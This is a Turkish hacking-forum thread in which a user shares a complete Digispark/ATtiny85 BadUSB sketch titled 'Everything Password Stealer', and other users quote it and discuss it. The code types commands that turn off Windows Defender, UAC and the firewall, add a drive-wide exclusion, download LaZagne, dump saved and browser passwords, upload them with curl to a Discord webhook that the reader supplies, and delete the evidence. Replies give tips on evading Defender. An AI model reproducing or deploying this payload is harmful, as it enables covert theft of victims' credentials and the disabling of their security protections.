Attiny85 için stealer (1 Viewer)

[Proto]

#include "DigiKeyboard.h"

void setup() {}

void loop() {
    DigiKeyboard.sendKeyStroke(0);
    // Title: Everything Password Stealer
    // Description: Steals every password in every windows 10 or 11 passwords with LaZagne
    // Bypasses UAC, Firewall, and Defender with persistence whatsoever
    // Exfil your data to your not-so private discord server with computer name as a filename (to avoid confusions as usual)
    // Author: sativa/einxrw
    
    DigiKeyboard.sendKeyStroke(UNDEFINED_KEY);
    DigiKeyboard.sendKeyStroke(0, MOD_GUI_LEFT,KEY_M);
    DigiKeyboard.delay(2000);
    
    // Open Windows Defender Settings
    DigiKeyboard.sendKeyStroke(MOD_CONTROL_LEFT,41);
    DigiKeyboard.delay(750);
    DigiKeyboard.print("windows security");
    DigiKeyboard.sendKeyStroke(KEY_ENTER);
    DigiKeyboard.delay(1500);
    DigiKeyboard.sendKeyStroke(KEY_ENTER);
    
    // Navigate to Manage Settings
    DigiKeyboard.delay(500);
    DigiKeyboard.sendKeyStroke(43);
    DigiKeyboard.delay(100);
    DigiKeyboard.sendKeyStroke(43);
    DigiKeyboard.delay(100);
    DigiKeyboard.sendKeyStroke(43);
    DigiKeyboard.delay(100);
    DigiKeyboard.sendKeyStroke(43);
    DigiKeyboard.delay(100);
    DigiKeyboard.sendKeyStroke(KEY_ENTER);
    DigiKeyboard.delay(500);
    
    // Open and turn off Realtime Protection
    DigiKeyboard.sendKeyStroke(44);
    DigiKeyboard.delay(1000);
    DigiKeyboard.sendKeyStroke(MOD_ALT_LEFT,KEY_Y);
    DigiKeyboard.delay(1000);
    
    // Exit security settings
    DigiKeyboard.sendKeyStroke(MOD_ALT_LEFT,KEY_F4);
    DigiKeyboard.delay(3000);
    DigiKeyboard.sendKeyStroke(0, MOD_GUI_LEFT,KEY_R);
    DigiKeyboard.delay(1000);
    
    // Open the Powershell as Administrator
    DigiKeyboard.print("powershell");
    DigiKeyboard.sendKeyStroke(UNDEFINED_KEY,KEY_ENTER);
    DigiKeyboard.delay(2000);
    DigiKeyboard.sendKeyStroke(MOD_ALT_LEFT,KEY_Y);
    DigiKeyboard.sendKeyStroke(KEY_ENTER);
    DigiKeyboard.delay(1000);
    
    // Disabling the UAC
    DigiKeyboard.print("Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System -Name ConsentPromptBehaviorAdmin -Value 0");
    DigiKeyboard.sendKeyStroke(KEY_ENTER);
    DigiKeyboard.delay(1000);
    
    // Disabling the Firewall Part 1
    DigiKeyboard.print("Set-MpPreference -DisableRealtimeMonitoring $true");
    DigiKeyboard.sendKeyStroke(KEY_ENTER);
    DigiKeyboard.delay(1000);
    
    // Disabling the Firewall Part 2
    DigiKeyboard.print("Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False");
    DigiKeyboard.sendKeyStroke(KEY_ENTER);
    DigiKeyboard.delay(1000);
    
    // Disabling the Virus and Threat Protection
    DigiKeyboard.print("New-ItemProperty -Path \"HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\" -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force");
    DigiKeyboard.sendKeyStroke(KEY_ENTER);
    DigiKeyboard.delay(1000);
    DigiKeyboard.print("Add-MpPreference -ExclusionPath \"C:\"");
    DigiKeyboard.sendKeyStroke(KEY_ENTER);
    DigiKeyboard.delay(3000);
    DigiKeyboard.print("$Test = [System.Environment]::GetEnvironmentVariable('TEMP','Machine');Start-BitsTransfer https://github.com/AlessandroZ/LaZagne/releases/download/v2.4.5/LaZagne.exe -Destination \"$Test/l.exe\"; cd $Test");
    DigiKeyboard.sendKeyStroke(KEY_ENTER);
    DigiKeyboard.delay(15000);
    DigiKeyboard.print(".\\l.exe all -vv > \"$env:computername.txt\"; .\\l.exe browsers -vv >> \"$env:computername.txt\"; curl.exe [DISCORD WEBHOOK URL] -F \"file1=@$Test/$env:computername.txt\"; Remove-Item \"$x/$env:computername.txt\", \"$x/l.exe\" -Force -ErrorAction SilentlyContinue");
    DigiKeyboard.sendKeyStroke(KEY_ENTER);
    DigiKeyboard.print("exit");
    DigiKeyboard.sendKeyStroke(KEY_ENTER);
    DigiKeyboard.sendKeyStroke(UNDEFINED_KEY);
}

Bu kodda belirlediğiniz discord webhook a log gelir

83. Satırda köseli parantez icinde discord webhook yazan yere kendi webhook adresinizi yazmalısınız

Özellikleri:

-Windows Defender Ayarlarını Açma:

Windows Defender ayarlarını açarak başlar.

-Realtime Protection Kapatma:

Real-time korumayı kapatır.

-UAC Devre Dışı Bırakma:

Kullanıcı Hesabı Kontrolünü (UAC) devre dışı bırakır.

-Firewall'ı Devre Dışı Bırakma:

Gerçek zamanlı izlemeyi devre dışı bırakır ve Güvenlik Duvarını kapatır.

-Virus ve Tehdit Korumasını Devre Dışı Bırakma:

Virüs ve Tehdit Korumasını devre dışı bırakır.

-LaZagne İndirme ve Çalıştırma:

LaZagne adlı bir aracı indirip çalıştırarak, bilgisayardaki kaydedilmiş şifreleri çalmaya çalışır.

-Elde Edilen Bilgileri Exfil Etmek:

Çalınan bilgileri bir dosyaya kaydeder ve belirtilen Discord sunucusuna göndermeye çalışır.
-Temizlik İşlemleri:

Dosyaları temizler ve işlemi sonlandırır.

Bu içeriği görmek için giriş yapın.

Giriş yap TG Destek Chat

 

[Radoxin]

Eline sağlık.

Digispark BadUSB güzel tool ama kısıtlı(512kb), bu tarz projelerde kodlar eski olduğundan çalışmayabiliyor. Varsa bu donanım aygıtı tanımlanamadı problemini çözebilicek yorumlara gelsin.

Bu içeriği görmek için giriş yapın.

Giriş yap TG Destek Chat

 

[Tron]

#include "DigiKeyboard.h"

void setup() {}

void loop() {
    DigiKeyboard.sendKeyStroke(0);
    // Title: Everything Password Stealer
    // Description: Steals every password in every windows 10 or 11 passwords with LaZagne
    // Bypasses UAC, Firewall, and Defender with persistence whatsoever
    // Exfil your data to your not-so private discord server with computer name as a filename (to avoid confusions as usual)
    // Author: sativa/einxrw
   
    DigiKeyboard.sendKeyStroke(UNDEFINED_KEY);
    DigiKeyboard.sendKeyStroke(0, MOD_GUI_LEFT,KEY_M);
    DigiKeyboard.delay(2000);
   
    // Open Windows Defender Settings
    DigiKeyboard.sendKeyStroke(MOD_CONTROL_LEFT,41);
    DigiKeyboard.delay(750);
    DigiKeyboard.print("windows security");
    DigiKeyboard.sendKeyStroke(KEY_ENTER);
    DigiKeyboard.delay(1500);
    DigiKeyboard.sendKeyStroke(KEY_ENTER);
   
    // Navigate to Manage Settings
    DigiKeyboard.delay(500);
    DigiKeyboard.sendKeyStroke(43);
    DigiKeyboard.delay(100);
    DigiKeyboard.sendKeyStroke(43);
    DigiKeyboard.delay(100);
    DigiKeyboard.sendKeyStroke(43);
    DigiKeyboard.delay(100);
    DigiKeyboard.sendKeyStroke(43);
    DigiKeyboard.delay(100);
    DigiKeyboard.sendKeyStroke(KEY_ENTER);
    DigiKeyboard.delay(500);
   
    // Open and turn off Realtime Protection
    DigiKeyboard.sendKeyStroke(44);
    DigiKeyboard.delay(1000);
    DigiKeyboard.sendKeyStroke(MOD_ALT_LEFT,KEY_Y);
    DigiKeyboard.delay(1000);
   
    // Exit security settings
    DigiKeyboard.sendKeyStroke(MOD_ALT_LEFT,KEY_F4);
    DigiKeyboard.delay(3000);
    DigiKeyboard.sendKeyStroke(0, MOD_GUI_LEFT,KEY_R);
    DigiKeyboard.delay(1000);
   
    // Open the Powershell as Administrator
    DigiKeyboard.print("powershell");
    DigiKeyboard.sendKeyStroke(UNDEFINED_KEY,KEY_ENTER);
    DigiKeyboard.delay(2000);
    DigiKeyboard.sendKeyStroke(MOD_ALT_LEFT,KEY_Y);
    DigiKeyboard.sendKeyStroke(KEY_ENTER);
    DigiKeyboard.delay(1000);
   
    // Disabling the UAC
    DigiKeyboard.print("Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System -Name ConsentPromptBehaviorAdmin -Value 0");
    DigiKeyboard.sendKeyStroke(KEY_ENTER);
    DigiKeyboard.delay(1000);
   
    // Disabling the Firewall Part 1
    DigiKeyboard.print("Set-MpPreference -DisableRealtimeMonitoring $true");
    DigiKeyboard.sendKeyStroke(KEY_ENTER);
    DigiKeyboard.delay(1000);
   
    // Disabling the Firewall Part 2
    DigiKeyboard.print("Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False");
    DigiKeyboard.sendKeyStroke(KEY_ENTER);
    DigiKeyboard.delay(1000);
   
    // Disabling the Virus and Threat Protection
    DigiKeyboard.print("New-ItemProperty -Path \"HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\" -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force");
    DigiKeyboard.sendKeyStroke(KEY_ENTER);
    DigiKeyboard.delay(1000);
    DigiKeyboard.print("Add-MpPreference -ExclusionPath \"C:\"");
    DigiKeyboard.sendKeyStroke(KEY_ENTER);
    DigiKeyboard.delay(3000);
    DigiKeyboard.print("$Test = [System.Environment]::GetEnvironmentVariable('TEMP','Machine');Start-BitsTransfer https://github.com/AlessandroZ/LaZagne/releases/download/v2.4.5/LaZagne.exe -Destination \"$Test/l.exe\"; cd $Test");
    DigiKeyboard.sendKeyStroke(KEY_ENTER);
    DigiKeyboard.delay(15000);
    DigiKeyboard.print(".\\l.exe all -vv > \"$env:computername.txt\"; .\\l.exe browsers -vv >> \"$env:computername.txt\"; curl.exe [DISCORD WEBHOOK URL] -F \"file1=@$Test/$env:computername.txt\"; Remove-Item \"$x/$env:computername.txt\", \"$x/l.exe\" -Force -ErrorAction SilentlyContinue");
    DigiKeyboard.sendKeyStroke(KEY_ENTER);
    DigiKeyboard.print("exit");
    DigiKeyboard.sendKeyStroke(KEY_ENTER);
    DigiKeyboard.sendKeyStroke(UNDEFINED_KEY);
}

Bu kodda belirlediğiniz discord webhook a log gelir

83. Satırda köseli parantez icinde discord webhook yazan yere kendi webhook adresinizi yazmalısınız

Özellikleri:

-Windows Defender Ayarlarını Açma:

Windows Defender ayarlarını açarak başlar.

-Realtime Protection Kapatma:

Real-time korumayı kapatır.

-UAC Devre Dışı Bırakma:

Kullanıcı Hesabı Kontrolünü (UAC) devre dışı bırakır.

-Firewall'ı Devre Dışı Bırakma:

Gerçek zamanlı izlemeyi devre dışı bırakır ve Güvenlik Duvarını kapatır.

-Virus ve Tehdit Korumasını Devre Dışı Bırakma:

Virüs ve Tehdit Korumasını devre dışı bırakır.

-LaZagne İndirme ve Çalıştırma:

LaZagne adlı bir aracı indirip çalıştırarak, bilgisayardaki kaydedilmiş şifreleri çalmaya çalışır.

-Elde Edilen Bilgileri Exfil Etmek:

Çalınan bilgileri bir dosyaya kaydeder ve belirtilen Discord sunucusuna göndermeye çalışır.
-Temizlik İşlemleri:

Dosyaları temizler ve işlemi sonlandırır.

include ettigin

#include "DigiKeyboard.h"

header dosyası yok yarım kod paylaşmışsın ve çok basit bir şey olmuş
Zararlı yazılımın çalışması için kullanıcı onayı gerektiren adımlar var (Örnek, UAC'yi devre dışı bırakma ve PowerShell'in yönetici olarak çalıştırılması). Kullanıcı bu onayı vermezse kod çalışmayacak. Direkt olarak PS üzerinden kapatma işlemleri yapmak anında Defender tarafından yakalanmasını sebebiyet verecektir kendini malware alaninda geliştirmeni öneririm.

Bu içeriği görmek için giriş yapın.

Giriş yap TG Destek Chat

 

[Radoxin]

include ettigin

#include "DigiKeyboard.h"

header dosyası yok yarım kod paylaşmışsın ve çok basit bir şey olmuş
Zararlı yazılımın çalışması için kullanıcı onayı gerektiren adımlar var (Örnek, UAC'yi devre dışı bırakma ve PowerShell'in yönetici olarak çalıştırılması). Kullanıcı bu onayı vermezse kod çalışmayacak. Direkt olarak PS üzerinden kapatma işlemleri yapmak anında Defender tarafından yakalanmasını sebebiyet verecektir kendini malware alaninda geliştirmeni öneririm.

include'de sorun yok, digisparkın kütüphanelerini manuel olarak kurduktan sonra bir sıkıntı çıkarmıyor, Ardunio'da yazıldığından farklı gelmiş olabilir onun dışında diğer söylediklerine katılıyorum.

Bu içeriği görmek için giriş yapın.

Giriş yap TG Destek Chat